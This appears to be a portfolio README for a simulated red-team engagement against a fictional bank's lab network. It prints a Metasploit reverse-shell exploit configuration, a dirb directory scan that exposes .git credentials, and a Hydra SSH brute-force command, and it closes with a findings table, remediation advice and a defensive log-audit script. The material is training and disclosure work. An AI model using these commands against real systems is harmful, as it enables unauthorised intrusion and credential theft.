A beginner-friendly, full-scope red teaming simulation conducted against PJ Bank's virtual infrastructure. This project involves reconnaissance, vulnerability scanning, exploitation of both Windows and Linux machines, and professional reporting.
This simulation mimics a real-world penetration test and follows standard red team methodology. The infrastructure includes:
| Asset | Hostname | IP Address |
|---|---|---|
| Public web server | Learnaboutsecurity.com | [REDACTED] |
| Employee workstation | Win10 | 10.1.2.4 |
| Web server in DMZ | DMZiServer | 10.1.0.7 |
| Payroll server (internal) | Debianx64DMZOnCloudNew | 10.1.0.12 |
- Used whois.com to gather registration info on learnaboutsecurity.com
- Used dnsdumpster.com to discover DNS records and host IPs
- Identified technologies like Cloudflare, Font Awesome, and HSTS using Wappalyzer
```bash
nmap -sV -p- -T4 -Pn 10.1.2.4
```

Discovered Apache 2.2.14 (outdated).

```
use exploit/windows/http/xampp_webdav_upload_php
set payload php/reverse_php
set RHOST 10.1.2.4
set LHOST 10.1.2.5
set LPORT 4444
run
```

Gained shell access to the Windows 10 machine.
#### 🖥️ Target 1: DMZiServer

##### 🔍 Directory Scan

```bash
dirb http://10.1.0.7/ ~/Downloads/Udacity.txt
```

Found a `.git/` directory and extracted `keys.txt` containing:

```
username: admin123
password: Password123!
```

#### 🔐 Target 2: Debian Internal Server

##### 🔓 Brute-Forcing SSH

```bash
hydra -l admin123 -P ~/Downloads/Udacity.txt ssh://10.1.0.12
```

Successfully cracked credentials.

```bash
ssh [email protected]
whoami
hostname
```

Gained full shell access.
#### 🔒 Key Vulnerabilities

| Severity | Issue |
|---|---|
| High | Public .git/ with exposed credentials |
| High | SSH access via weak credentials |
| Medium | Apache 2.2.14 outdated and exploitable |
| Low | Misconfigured /server-status endpoint |
- Block access to developer folders like .git/
- Enforce strong password and MFA policies
- Regularly patch public-facing software
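
A defender-side check for the findings above, added here as an example and not part of the original project: it reads web server access logs and flags successful responses for `.git/` or `/server-status`, plus clients producing bursts of 404s, the trace a wordlist-driven directory scan leaves behind. The log lines, addresses, the function name `audit` and the threshold of 5 are constructed assumptions.

```python
import re
from collections import Counter

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Paths from the findings table that should never be served successfully.
SENSITIVE = re.compile(r'^/(\.git(/|$)|server-status(\?|$))')
SCAN_404_THRESHOLD = 5  # assumption: tune to the site's normal 404 rate

def audit(lines, threshold=SCAN_404_THRESHOLD):
    """Return (exposed, scanners): sensitive paths answered with 2xx, and
    {client: 404 count} for clients whose 404 volume suggests a wordlist scan."""
    exposed, not_found = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        status = int(m["status"])
        if SENSITIVE.match(m["path"]) and 200 <= status < 300:
            exposed.append((m["ip"], m["path"], status))
        if status == 404:
            not_found[m["ip"]] += 1
    scanners = {ip: n for ip, n in not_found.items() if n >= threshold}
    return exposed, scanners

# Constructed sample log (documentation addresses, not engagement data).
WORDS = ["admin", "backup", "cgi-bin", "old", "test", "tmp"]
SAMPLE = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:0{i} +0000] "GET /{w} HTTP/1.1" 404 196'
    for i, w in enumerate(WORDS)
] + [
    '192.0.2.10 - - [01/Jan/2024:10:00:07 +0000] "GET /.git/HEAD HTTP/1.1" 200 23',
    '192.0.2.10 - - [01/Jan/2024:10:00:08 +0000] "GET /server-status HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /.git/config HTTP/1.1" 403 199',
    '198.51.100.7 - - [01/Jan/2024:10:01:03 +0000] "GET /favicon.ico HTTP/1.1" 404 196',
]

if __name__ == "__main__":
    exposed, scanners = audit(SAMPLE)
    for ip, path, status in exposed:
        print(f"EXPOSED  {path} served {status} to {ip}")
    for ip, count in scanners.items():
        print(f"SCANNING {ip} produced {count} 404 responses")
```

A `403` on `/.git/config` is not reported, so the same script confirms the block is in place after remediation.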
#### 🧰 Tools Used

- Kali Linux
- whois, dnsdumpster, wappalyzer
- nmap, dirb, hydra, msfconsole
All evidence and screenshots are saved in the /screenshots directory and referenced in the final report.
Jamilu Ibrahim Richifa LinkedIn | GitHub